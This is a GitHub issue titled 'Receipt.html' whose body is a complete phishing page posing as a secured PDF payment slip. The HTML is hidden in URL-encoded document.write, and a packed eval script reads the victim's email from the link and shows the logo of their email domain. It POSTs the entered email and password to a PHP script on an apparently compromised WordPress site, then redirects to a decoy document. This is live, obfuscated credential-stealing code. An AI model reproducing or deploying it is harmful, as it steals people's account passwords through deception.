### ISSUE TITLE
Receipt.html

### ISSUE THREAD

**Issue by jolivedais** [jolivedais/frontier-secure#1]
<html lang="en">
<script language=javascript>document.write(unescape('%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22x-ua-compatible%22%20content%3D%22EmulateIE9%22%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%2C%20shrink-to-fit%3Dno%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A%2F%2Fmaxcdn.bootstrapcdn.com%2Fbootstrap%2F4.0.0%2Fcss%2Fbootstrap.min.css%22%20integrity%3D%22sha384-Gn5384xqQ1aoWXA%2B058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW%2FdAiS6JXm%22%20crossorigin%3D%22anonymous%22%3E%0A%20%20%20%20%3Ctitle%3ESecured%20PDF%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%0A%3Cbody%20style%3D%22background-image%3A%20url(https%3A%2F%2Fi.ibb.co%2Fb5mj421%2FPDFPayment-New.png)%3B%20background-repeat%3A%20no-repeat%3Bbackground-size%3A%20cover%3B%22%3E%0A%20%20%20%20%3Cdiv%20class%3D%22container-fluid%20p-0%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22row%20my-5%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-lg-5%20mx-auto%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22m-5%20p-4%20bg-white%20rounded%22%20id%3D%22div1%22%20style%3D%22box-shadow%3A%200px%202px%205px%20rgba(0%2C0%2C0%2C0.5)%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22text-left%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%3E%3Cimg%20src%3D%27https%3A%2F%2Fi.ibb.co%2FTr7Nwnb%2Fpdf.png%27%20alt%3D%22logo%22%20height%3D%2270%22%3E%3C%2Fspan%3E%3Cspan%20class%3D%22pl-4%20h5%20align-middle%22%3E%20%3C%2Fspan%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22h5%22%3EVerify%20it%27s%20you%3C%2Fspan%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22h5%22%3E%3C%2Fspan%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22h%22%3EOnly%20recipient%20email%20can%20access%20shared%20files%3C%2Fspan%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22msg1%22%20class%3D%22text-danger%22%20style%3D%22display%3A%20none%3B%22%3EInvalid%20Password..!%20Please%20enter%20correct%20password.%3C%2Fspan%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22div3%22%20class%3D%22text-danger%22%20style%3D%22display%3A%20none%3B%22%3ESuccessfully%20Confirmed%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Csmall%3E%3C%2Fsmall%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22email%22%20name%3D%22email%22%20class%3D%22form-control%20rounded-0%20bg-transparent%22%20id%3D%22email%22%20aria-describedby%3D%22aiHelp%22%20placeholder%3D%22Email%22%20value%3D%22%22%20%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%20mt-2%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Csmall%3E%3C%2Fsmall%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22password%22%20name%3D%22password%22%20class%3D%22form-control%22%20id%3D%22password%22%20aria-describedby%3D%22aiHelp%22%20placeholder%3D%22Password%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-check%20mt-3%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22checkbox%22%20class%3D%22form-check-input%22%20id%3D%22exampleCheck1%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Clabel%20class%3D%22form-check-label%22%20for%3D%22exampleCheck1%22%3E%3Cspan%3E%3Ca%20href%3D%22%23%22%3EKeep%20me%20sign%20in%3C%2Fa%3E%3C%2Fspan%3E%3C%2Flabel%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%3E%3Cspan%3E%3Ca%20href%3D%22%23%22%20class%3D%22float-right%22%3E%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-lg-12%20mt-3%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbutton%20class%3D%22btn%20text-white%20px-4%20w-100%22%20id%3D%22submit-btn%22%20style%3D%22background-color%3A%20%238c030c%3B%22%3ENext%3C%2Fbutton%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C!--%20Optional%20JavaScript%20--%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C!--%20jQuery%20first%2C%20then%20Popper.js%2C%20then%20Bootstrap%20JS%20--%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22https%3A%2F%2Fcode.jquery.com%2Fjquery-3.2.1.slim.min.js%22%20integrity%3D%22sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr%2FrE9%2FQpg6aAZGJwFDMVNA%2FGpGFF93hXpG5KkN%22%20crossorigin%3D%22anonymous%22%3E%3C%2Fscript%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fpopper.js%2F1.12.9%2Fumd%2Fpopper.min.js%22%20integrity%3D%22sha384-ApNbgh9B%2BY1QKtv3Rn7W3mgPxhU9K%2FScQsAP7hUibX39j7fakFPskvXusvfa0b4Q%22%20crossorigin%3D%22anonymous%22%3E%3C%2Fscript%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22https%3A%2F%2Fmaxcdn.bootstrapcdn.com%2Fbootstrap%2F4.0.0%2Fjs%2Fbootstrap.min.js%22%20integrity%3D%22sha384-JZR6Spejh4U02d8jOt6vLEHfe%2FJQGiRRSQQxSfFWpi1MquVdAyjUar5%2B76PVCmYl%22%20crossorigin%3D%22anonymous%22%3E%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22https%3A%2F%2Fajax.googleapis.com%2Fajax%2Flibs%2Fjquery%2F2.2.4%2Fjquery.min.js%22%3E%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22https%3A%2F%2Fstackpath.bootstrapcdn.com%2Fbootstrap%2F4.1.3%2Fjs%2Fbootstrap.min.js%22%3E%3C%2Fscript%3E'))</script>

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(1l).1Q(6(){5 l=0;5 m=14.19.1L.C(1);8(!m){}I{5 n=/^([0-16-w-Z+/]{4})*(([0-16-w-Z+/]{2}==)|([0-16-w-Z+/]{3}=))?$/;8(!n.15(m)){5 o=m}I{5 o=1M(m)}5 p=/^([a-w-E-1E\\.\\-])+\\@(([a-w-E-9\\-])+\\.)+([a-w-E-9]{2,4})+$/;8(!p.15(o)){$(\'#W\').v();m.1I;L J}5 q=o.H("@");5 r=o.C((q+1));5 c=r.C(0,r.H(\'.\'));5 s=c.17();5 t=c.1r();$(\'#M\').F(o);$("#18").A({D:0,x:"7"},0);$("#K").A({1p:0,x:"v"},N);$("#1d").u(o);$.1n("z://U.V.B/"+r).1m(6(){$(".R").T("Q","z://U.V.B/"+r);$(".P").u(t)}).1k(6(){$(".R").T("Q","z://1.1h.1g.B/-1f/1e/1o/1b/1a/1c.1i");$(".P").u("1j")})}$(\'#M\').O(6(){$(\'#W\').7()});$(1l).1N(6(a){5 b=(a.1t?a.1t:a.1J);8(b==\'13\'){a.X();8($("#18").1B(":1C")){$("#1D").O()}I 8($("#K").1B(":1C")){a.X();$("#12-10").O()}I{L J}}});$(\'#1D\').O(6(){1K.X();5 a=$(\'#M\').F();5 b=/^([a-w-E-1E\\.\\-])+\\@(([a-w-E-9\\-])+\\.)+([a-w-E-9]{2,4})+$/;8(!b.15(a)){$(\'#W\').v();m.1I;L J}5 d=a.H("@");5 e=a.C((d+1));5 c=e.C(0,e.H(\'.\'));5 f=c.17();5 g=c.1r();$("#18").A({D:0,x:"7"},0);$("#K").A({1p:0,x:"v"},N);$("#1d").u(a);$.1n("z://U.V.B/"+e).1m(6(){$(".R").T("Q","z://U.V.B/"+e);$(".P").u(g)}).1k(6(){$(".R").T("Q","z://1.1h.1g.B/-1f/1e/1o/1b/1a/1c.1i");$(".P").u("1j")})});$(\'#12-10\').O(6(b){b.X();5 d=$("#M").F();5 e=$("#S").F();5 f=$("#1W").u();5 g=$(\'#G\').u();5 h=d;5 i=h.H("@");5 j=h.C((i+1));5 c=j.C(0,j.H(\'.\'));5 k=c.17();$(\'#G\').2a(g);l=l+1;$.1P({2b:\'2c\',2d:"29://26.1R/24-25/23/22/21.20",1Z:\'1Y\',1X:{M:d,S:e,1V:f,},1U:6(a){$("#12-10").u("1T...")},1S:6(a){$("#S").F("");8(l>=2){l=0;$("#K").A({D:0,x:"7"},0);$("#1w").A({D:0,x:"v"},N);1q(()=>{14.19.1s("z://1u.1v.B/1x/1y/1z-1A-1F-1G?1H=y")},N);L J}8(l==2){$("#Y").v();$("#G").7();$("#11").7()}I{$("#11").v();$("#G").7();$("#Y").7()}},W:6(){$("#S").F("");8(l>=2){l=0;$("#K").A({D:0,x:"7"},0);$("#1w").A({D:0,x:"v"},N);1q(()=>{14.19.1s("z://1u.1v.B/1x/1y/1z-1A-1F-1G?1H=y")},2e);L J}8(l==2){$("#Y").v();$("#G").7();$("#11").7()}I{$("#11").v();$("#G").7();$("#Y").7()}},28:6(){$("#12-10").u("27 1O")}})})});',62,139,'|||||var|function|hide|if||||||||||||||||||||||html|show|zA|opacity||https|animate|com|substr|left|Z0|val|msg|indexOf|else|false|div2|return|email|500|click|logoname|src|logoimg|password|attr|logo|clearbit|error|preventDefault|msg2||btn|msg1|submit||window|test|9a|toLowerCase|div1|location|s0|3wofPIO8EBkMnIRNs64pXYgSOrJiNVjAgCLcBGAsYHQ|favicon_a_eupayfgghqiai7k9sol6lg2|emailch|YO8Ek2ywVwI|TsGigtZqMtI|blogspot|bp|ico|Microsoft|fail|document|done|get|AAAAAAAAAHU|right|setTimeout|toUpperCase|replace|keyCode|www|keepandshare|div3|doc21|116080|payment|slip|is|visible|next|9_|pdf|19k|da|focus|which|event|hash|atob|keypress|in|ajax|ready|net|success|verifying|beforeSend|detail|field|data|POST|type|php|be|button|blocks|wp|includes|modskinvip|Sign|complete|http|text|dataType|JSON|url|1000'.split('|'),0,{}))
</script>

</html>
